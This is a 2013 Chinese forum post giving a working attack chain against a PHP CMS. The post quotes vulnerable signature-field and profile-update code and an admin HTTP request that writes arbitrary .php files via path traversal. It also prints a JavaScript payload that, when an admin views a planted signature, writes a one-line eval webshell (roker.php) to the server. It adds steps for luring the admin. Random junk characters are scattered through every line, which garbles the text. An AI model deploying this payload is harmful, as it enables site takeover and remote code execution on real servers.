|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
X+ n/ h9 @& p7 u; M' Q- g7 ^官网已经修补了,所以重新下了源码
1 Q3 t6 F5 ^. Q, b+ v6 I因为 后台登入 还需要认证码 所以 注入就没看了。
7 G& i6 Z+ `& X: K0 s3 A2 s0 x* x存在 xss
N$ N* t$ b( }0 H漏洞文件 user/member/skin_edit.php% q+ s8 M" y" r% U. m6 _6 x" l7 L
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:6 M$ k/ C0 I. @) l
. H j ?# J" R* a7 [, @9 b! O</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
5 W) N& V1 k7 y# v: ]# a ; b' [3 @* L8 ?- z9 ^0 D
</textarea></td></tr>$ u& O2 R1 T1 N& t
/ W; t8 B, ~- k& ?: [ user/do.php
4 _2 u4 }9 T3 I2 s) e3 B! {3 z- ?$ t
: M- ~7 u3 Q! W; Y) M1 v i
% s2 M, j& K yif($op=='zl'){ //资料( _) g B$ ^5 ]$ l1 a) h
0 G: h8 A0 u" ^. f
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
$ B8 G X+ P, |# l! j! { exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));8 z" h5 O, t% A2 d
s5 c0 }; L# g; Y# I9 y G
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',* I" ~! q# ~' k; {$ H3 ]$ g
* k: C' ~ c8 e# E/ B+ ?8 K CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'- Z+ K0 G9 d( F) C
where CS_Name='".$cscms_name."'";. A" J+ x* t8 X; U( ~ k) g8 Z d
5 a5 D* B; w! j# P
if($db->query($sql)){
0 _. f/ B2 p h3 D) z
! J' z% K; N/ N9 T8 \" @8 ^ exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);')); e( h" E2 M0 a9 l/ y; ?
; V! G; l$ H# q; |2 G. n7 E }else{
) e& p1 H, ?* w6 P
" x6 F2 d3 ?- u4 A1 F4 k% l exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
' T0 _. U; h _* F. l, |1 x 1 Q8 P. u( j0 P% L" k# k
}
5 [7 K- h6 ^8 A- q t: p# u. \' A
" w; h, h" J+ Z9 z# h$ I2 u v) @5 k' D( Y i$ T8 r: y& @6 p7 { ]
没有 过滤导致xss产生。, c* ?, @2 T* O( I4 K
后台 看了下 很奇葩的是可以写任意格式文件。。3 r* N: C) [9 t
抓包。。
6 S5 Y% y6 K- l6 h1 x
# M* [$ R5 D% P. l( x- n# p+ x0 L A8 A* p9 u
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1* T- {1 ?+ |, ]% x
* l' ?! s4 ]3 T I( {* K2 c: ]
Accept: text/html, application/xhtml+xml, */*2 L- }) @! G3 D9 [5 f& O
& d/ I# {# P- y# H0 G& E, L5 l& DReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php9 R& c8 g8 d- C8 ~7 g6 [* v
3 m& Y2 l- e. c5 K0 U% t' C4 p9 hAccept-Language: zh-CN
$ g" t# k/ J% w* t1 @- q* P 6 n& q- F8 e" S
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)) |6 M9 d0 i" \
# S7 S5 J8 }" f4 ?5 } W, |9 QContent-Type: application/x-www-form-urlencoded! ]1 d% P6 b" G% e
2 [8 R+ x- n! n( k9 k! A
Accept-Encoding: gzip, deflate4 k4 v" L2 d( J8 H
+ {# z# q% a& \" r# h! e; L' v( [
Host: 127.0.0.11 X$ g6 h& v' c6 N/ ~( Z6 V
; g; z) o3 }' |7 v1 @" S7 ^
Content-Length: 38
& j0 L1 @' C2 E7 I+ } : H, e0 }0 X; ?7 B* g; p! N
DNT: 1/ J* ^- L6 [! l! o
" E5 B. \; t2 ?Connection: Keep-Alive! G5 x7 f' {- K2 h% q% t
: i, }7 @) Q8 v' i
Cache-Control: no-cache
- R7 n$ ~- z0 q8 |+ F . m) x& \* ]4 n3 y
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
7 f7 L& _, P8 i( U! B" |* T7 N/ C" ^
O. |* @; u7 |& M/ z- H) j: k* N7 O2 u, z3 J* x2 @% r# b
name=aaa.php&content=%3Cs%3E%3Ca%25%3E: M- `4 B# V. l" }' H) }4 D
/ Z1 @$ F+ _, A% {) l- H
' h+ m( j# p. J" B
; }" V$ C3 c# C) V" i- ]于是 构造js如下。- Y% H/ [8 l, Q# u, d
Y% A. ~; Q) l) \& v1 r
本帖隐藏的内容<script>
& k3 ^# r# u1 O' hthisTHost = top.location.hostname;
: {* B' M3 e. w
/ f: b2 b7 x) d/ M& w' T2 DthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";: K( K0 | F* P# h
' s" f. w& `. z6 k, Hfunction PostSubmit(url, data, msg) { 7 I( W: m0 V2 n# n+ P8 v8 c: T
var postUrl = url;
, J1 i8 p& x& j/ a& T % u! U' P8 P" V6 V! d7 u
var postData = data;
' {4 e9 q4 J: I var msgData = msg;
$ X7 B8 h% {5 I# U- J var ExportForm = document.createElement("FORM"); % N# d$ }2 G6 L' k" w" z: t2 e' j' @
document.body.appendChild(ExportForm); 0 v# q) S! {# v7 ^
ExportForm.method = "POST";
2 y( G# [" K0 h d; O var newElement = document.createElement("input"); % w" x) {+ K# K( h/ S {% j
newElement.setAttribute("name", "name"); ( e4 }/ z0 Z2 x3 A
newElement.setAttribute("type", "hidden"); / C' {0 ^0 p& V e" |! F1 p: [
var newElement2 = document.createElement("input"); & a* l2 q7 C. ]" y
newElement2.setAttribute("name", "content");
) X; |" d+ v4 K3 ?: h newElement2.setAttribute("type", "hidden");
4 k1 o( m' B4 T6 }; \4 x ExportForm.appendChild(newElement); & Y6 e: n0 X- T8 Z
ExportForm.appendChild(newElement2); ; e2 p9 H1 [/ o( t( n5 B8 D
newElement.value = postData;
# a+ T/ @; o- L- _* C0 X newElement2.value = msgData;
/ E# c" C- _" {* W. |6 D5 S ExportForm.action = postUrl; ; B/ m- u, |# p7 U3 K' L8 w1 _
ExportForm.submit();
$ g5 q( e: V5 f+ d; @};
3 v, T, A* \) N* A 8 N, w2 X$ Q1 L+ e7 B
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");1 e" b* J ?% D* x( b" }
! t; T% l; m$ n+ `6 P5 p
</script>
; J6 ]7 _1 ~ p! X% [# O4 J6 [: Z( p3 q0 N3 R! w$ E" v. D
9 t, }, v% G) a+ |9 d# e- p. T/ L% u+ z2 j% \9 c [
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入9 R& i+ i& h" D0 E$ @" ~
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)4 U, W S4 A( u6 m& M
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
" x6 c% x) @' f0 t. ?5 S |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对